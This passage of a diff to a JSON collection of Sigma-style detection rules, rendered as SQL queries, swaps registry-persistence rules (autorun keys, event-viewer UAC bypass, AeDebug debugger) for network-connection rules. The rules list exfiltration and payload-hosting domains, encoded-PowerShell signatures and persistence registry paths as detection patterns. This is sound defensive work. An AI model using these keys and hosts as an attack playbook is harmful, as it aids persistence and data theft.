'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\'" ], - "filename": "registry_set_persistence_outlook_todaypage.yml" + "filename": "net_connection_win_eqnedt.yml" }, { - "title": "CurrentVersion Autorun Keys Modification", - "id": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Download a File with IMEWDBLD.exe", + "id": "8d7e392e-9b28-49e1-831d-5949c6281228", + "status": "test", + "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Legitimate script" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\System\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Explorer\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logoff%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\PLAP Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Provider Filters%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)' OR TargetObject LIKE '%\\\\NgcFirst\\\\ConsecutiveSwitchCount' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\devicecensus.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\winsat.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\KeePass Password Safe 2\\\\ShInstUtil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Everything\\\\Everything.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\LogonUI.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{D6886603-9D2F-4EB2-B667-1971041FA96B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{BEC09223-B018-416D-A0AC-523971B639F5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\regsvr32.exe' ESCAPE '\\' AND TargetObject LIKE '%DropboxExt%' ESCAPE '\\' AND NewValue LIKE '%A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Opera Browser Assistant' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Opera\\\\assistant\\\\browser\\_assistant.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\iTunesHelper' ESCAPE '\\' AND NewValue LIKE '\"C:\\\\Program Files\\\\iTunes\\\\iTunesHelper.exe\"' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\zoommsirepair' ESCAPE '\\' AND NewValue LIKE '\"C:\\\\Program Files\\\\Zoom\\\\bin\\\\installer.exe\" /repair' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Greenshot' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Greenshot\\\\Greenshot.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\GoogleDriveFS' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\GoogleDriveFS.exe%' ESCAPE '\\') OR (TargetObject LIKE '%GoogleDrive%' ESCAPE '\\' AND NewValue IN ('{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}', '{A8E52322-8734-481D-A7E2-27B309EF8D56}', '{C973DA94-CBDF-4E77-81D1-E5B794FBD146}', '{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}')) OR ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \"C:\\\\Users\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\') AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{%' ESCAPE '\\' AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Package Cache\\\\{%' ESCAPE '\\' AND NewValue LIKE '%}\\\\python-%' ESCAPE '\\' AND NewValue LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND NewValue LIKE '%\\\\Microsoft\\\\Teams\\\\Update.exe --processStart %' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\userinit.exe' ESCAPE '\\' AND NewValue = 'ctfmon.exe /n') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\Setup\\\\%' ESCAPE '\\' AND (NewValue LIKE '\"C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR NewValue LIKE '\"C:\\\\Program Files (x86)\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR NewValue LIKE '{472083B0-C522-11CF-8763-00608CC02F24}' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\aurora-dashboard' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Aurora-Agent\\\\tools\\\\aurora-dashboard.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Everything' ESCAPE '\\' AND NewValue LIKE '%\\\\Everything\\\\Everything.exe\" -startup' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" ], - "filename": "registry_set_asep_reg_keys_modification_currentversion.yml" + "filename": "net_connection_win_imewdbld.yml" }, { - "title": "UAC Bypass via Event Viewer - Registry Set", - "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", + "title": "Microsoft Sync Center Suspicious Network Connections", + "id": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", "status": "experimental", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", + "author": "elhoim", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1055", + "attack.t1218", + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\') AND DestinationIsIpv6 = 'false'))" ], - "filename": "registry_set_uac_bypass_eventvwr.yml" + "filename": "net_connection_win_susp_outbound_mobsync_connection.yml" }, { - "title": "Suspicious Service Installed", - "id": "f2485272-a156-4773-82d7-1d178bc4905b", + "title": "Microsoft Binary Suspicious Communication Endpoint", + "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", "status": "test", - "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1562.001", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ - "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." + "Unknown", + "@subTee in your network" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\NalDrv\\\\ImagePath' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PROCEXP152\\\\ImagePath' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\') AND NewValue LIKE '%\\\\WINDOWS\\\\system32\\\\Drivers\\\\PROCEXP152.SYS%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE 'C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Temp\\\\%' ESCAPE '\\') AND (Initiated = 'true' AND (DestinationHostname LIKE '%.ghostbin.co' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\')))" ], - "filename": "registry_set_susp_service_installed.yml" + "filename": "net_connection_win_binary_susp_com.yml" }, { - "title": "Add Debugger Entry To AeDebug For Persistence", - "id": "092af964-4233-4373-b4ba-d86ea2890288", - "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Notepad Making Network Connection", + "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "status": "test", + "description": "Detects suspicious network connection by Notepad", + "author": "EagleEye Team", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.execution", + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AeDebug\\\\Debugger%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\') AND NOT (NewValue LIKE '\"C:\\\\WINDOWS\\\\system32\\\\vsjitdebugger.exe\" -p \\%ld -e \\%ld -j 0x\\%p' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" ], - "filename": "registry_set_aedebug_persistence.yml" + "filename": "net_connection_win_notepad_network_connection.yml" }, { - "title": "CrashControl CrashDump Disabled", - "id": "2ff692c2-4594-41ec-8fcb-46587de769e0", - "status": "experimental", - "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Silenttrinity Stager Msbuild Activity", + "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "status": "test", + "description": "Detects a possible remote connections to Silenttrinity c2", + "author": "Kiran kumar s, oscd.community", "tags": [ - "attack.t1564", - "attack.t1112" + "attack.execution", + "attack.t1127.001" ], "falsepositives": [ - "Legitimate disabling of crashdumps" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\CrashControl%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" ], - "filename": "registry_set_crashdump_disabled.yml" + "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" }, { - "title": "Registry Persistence via Explorer Run Key", - "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", - "status": "test", - "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", - "author": "Florian Roth (Nextron Systems), oscd.community", - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], + "title": "Suspicious Dropbox API Usage", + "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "status": "experimental", + "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate use of the API with a tool that the author wasn't aware of" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((NewValue LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR NewValue LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\Dropbox%' ESCAPE '\\'))" ], - "filename": "registry_set_susp_reg_persist_explorer_run.yml" + "filename": "net_connection_win_susp_dropbox_api.yml" }, { - "title": "Scripted Diagnostics Turn Off Check Enabled - Registry", - "id": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", - "status": "experimental", - "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Dllhost Internet Connection", + "id": "cfed2f44-16df-4bf3-833a-79405198b277", + "status": "test", + "description": "Detects Dllhost that communicates with public IP addresses", + "author": "bartblaze", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218", + "attack.execution", + "attack.t1559.001" ], "falsepositives": [ - "Administrator actions" + "Communication to other corporate systems that use IP addresses from public address spaces" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\ScriptedDiagnostics\\\\TurnOffCheck' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" ], - "filename": "registry_set_enabling_turnoffcheck.yml" + "filename": "net_connection_win_dllhost_net_connections.yml" }, { - "title": "Suspicious Environment Variable Has Been Registered", - "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", - "status": "test", - "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Communication To Ngrok.Io", + "id": "18249279-932f-45e2-b37a-8925f2597670", + "status": "experimental", + "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of ngrok.io" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (NewValue IN ('powershell', 'pwsh') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR NewValue LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR NewValue LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%SW52b2tlL%' ESCAPE '\\' OR NewValue LIKE '%ludm9rZS%' ESCAPE '\\' OR NewValue LIKE '%JbnZva2Ut%' ESCAPE '\\' OR NewValue LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR NewValue LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR NewValue LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (NewValue LIKE 'SUVY%' ESCAPE '\\' OR NewValue LIKE 'SQBFAF%' ESCAPE '\\' OR NewValue LIKE 'SQBuAH%' ESCAPE '\\' OR NewValue LIKE 'cwBhA%' ESCAPE '\\' OR NewValue LIKE 'aWV4%' ESCAPE '\\' OR NewValue LIKE 'aQBlA%' ESCAPE '\\' OR NewValue LIKE 'R2V0%' ESCAPE '\\' OR NewValue LIKE 'dmFy%' ESCAPE '\\' OR NewValue LIKE 'dgBhA%' ESCAPE '\\' OR NewValue LIKE 'dXNpbm%' ESCAPE '\\' OR NewValue LIKE 'H4sIA%' ESCAPE '\\' OR NewValue LIKE 'Y21k%' ESCAPE '\\' OR NewValue LIKE 'cABhAH%' ESCAPE '\\' OR NewValue LIKE 'Qzpc%' ESCAPE '\\' OR NewValue LIKE 'Yzpc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" ], - "filename": "registry_set_suspicious_env_variables.yml" + "filename": "net_connection_win_ngrok_io.yml" }, { - "title": "Potential Registry Persistence Attempt Via Windows Telemetry", - "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", + "title": "Communication To Mega.nz", + "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", "status": "test", - "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", - "author": 